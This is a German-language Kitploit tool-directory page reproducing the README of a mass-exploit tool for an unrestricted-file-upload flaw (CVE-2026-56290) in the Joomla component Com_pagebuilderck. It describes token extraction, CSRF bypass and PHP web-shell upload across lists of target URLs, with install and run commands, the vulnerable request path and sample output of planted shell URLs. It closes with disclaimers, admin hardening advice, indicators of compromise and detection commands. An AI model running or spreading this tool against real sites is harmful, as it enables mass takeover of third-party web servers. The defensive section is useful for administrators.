Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-56290 — CVE-2026-56290 – Massen-Exploit für die Joomla-Komponente Com_pagebuilderck (Uneingeschränkter Datei-Upload → RCE). Multithreaded, automatischer CSRF-Bypass, PHP-Shell-Uploader. | Kitploit
Tools/GitHubGitHub/jenderal92/cve-2026-56290
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed Teaming
GitHubjenderal92/cve-2026-56290

CVE-2026-56290

CVE-2026-56290 – Massen-Exploit für die Joomla-Komponente Com_pagebuilderck (Uneingeschränkter Datei-Upload → RCE). Multithreaded, automatischer CSRF-Bypass, PHP-Shell-Uploader.

Repository anzeigen
323vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-56290 - Com_pagebuilderck Massen-Exploit

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken.

  • Unbefugter Zugriff auf Computersysteme ist illegal
  • Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für deren Tests Sie eine ausdrückliche Genehmigung haben
  • Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden
  • Durch die Nutzung dieses Tools erklären Sie sich damit einverstanden, alle geltenden Gesetze und Vorschriften einzuhalten

Weitere Haftungsausschlüsse finden Sie auf der Titelseite von Jenderal92. Sie können sie HIER !!! einsehen

📋 Beschreibung

CVE-2026-56290 ist ein Massen-Exploit-Tool, das die Com_pagebuilderck-Joomla-Komponente angreift. Diese Schwachstelle ermöglicht es entfernten Angreifern, beliebige PHP-Dateien über einen uneingeschränkten Datei-Upload-Mechanismus hochzuladen, was zu Remote Code Execution (RCE) führt.

🔍 Schwachstellendetails

AttributWert
CVE-IDCVE-2026-56290
KomponenteCom_pagebuilderck
PlattformJoomla! CMS
TypUneingeschränkter Datei-Upload (RCE)
CVSS-Score9.8 (Kritisch)

🎯 So funktioniert es

  1. Token-Extraktion: Ruft das CSRF-Token von der Zielseite ab
  2. Datei-Upload: Lädt eine PHP-Shell in /media/com_pagebuilderck/gfonts/ hoch
  3. Shell-Bestätigung: Verifiziert den erfolgreichen Upload, indem die Shell-Ausgabe geprüft wird
  4. Ergebnisspeicherung: Speichert verwundbare URLs in reslt.txt

📦 Anforderungen

Systemanforderungen

root@kitploit:~
Python 2.7
pip (Python package installer)

Python-Abhängigkeiten

root@kitploit:~
pip install requests colorama

🔧 Installation

  1. Repository klonen
root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
  1. Abhängigkeiten installieren
root@kitploit:~
pip install -r requirements.txt

📖 Verwendung

Grundlegende Verwendung

root@kitploit:~
python CVE-2026-56290.py targets.txt

Format der Eingabedatei

Erstellen Sie eine Datei targets.txt mit einer URL pro Zeile:

root@kitploit:~
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# Comments are ignored

Ausgabe

· Konsolenausgabe: Fortschritt und Ergebnisse in Echtzeit · reslt.txt: Enthält alle verwundbaren Shell-URLs

Beispielausführung

root@kitploit:~
$ python CVE-2026-56290.py targets.txt

[+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit
[+] Threads: 15
[+] Timeout: 10s
[+] Output file: reslt.txt

[+] Loaded 100 targets from file
[*] Starting pool with 15 processes...

[1] Queueing: https://example1.com
[2] Queueing: https://example2.com
...
[1] ✓✓✓ VULNERABLE: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php

⚙️ Konfiguration

Sie können diese Variablen im Skript ändern:

root@kitploit:~
THREADS = 15           # Number of concurrent workers
TIMEOUT = 10           # Request timeout in seconds
USER_AGENT = "..."     # Custom User-Agent string
OUTPUT_FILE = "reslt.txt"  # Output filename

🛡️ Sicherheitshinweise

Für Systemadministratoren

Wenn Sie eine Joomla-Website mit Com_pagebuilderck betreiben:

  1. Aktualisieren Sie umgehend auf die neueste gepatchte Version
  2. Entfernen Sie die Komponente, wenn sie nicht mehr benötigt wird
  3. Überwachen Sie /media/com_pagebuilderck/gfonts/ auf verdächtige Dateien
  4. Implementieren Sie WAF-Regeln, um PHP-Uploads zu blockieren
  5. Prüfen Sie die Server-Logs auf Exploit-Versuche

Indikatoren einer Kompromittierung (IoC)

Achten Sie auf diese Anzeichen einer Ausnutzung:

root@kitploit:~
# Suspicious files in
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar

# Suspicious requests
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1

Erkennungsbefehle

root@kitploit:~
# Find suspicious PHP files in the media directory
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f

# Check for recent modifications
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7

# Look for suspicious file names (random strings)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'

⚠️ Rechtlicher Hinweis

Diese Software wird "WIE BESEHEN" ohne jegliche Gewährleistung bereitgestellt. Der Autor ist nicht verantwortlich für eine illegale oder unethische Nutzung dieses Tools. Holen Sie vor dem Testen eines Systems stets eine ordnungsgemäße Genehmigung ein.

🙏 Danksagungen

· Sicherheitsforscher, die CVE-2026-56290 entdeckt und gemeldet haben · Die Joomla-Community für die Pflege des CMS

Denken Sie daran: Mit großer Macht kommt große Verantwortung. Nutzen Sie dieses Tool ethisch und legal.

Tool herunterladen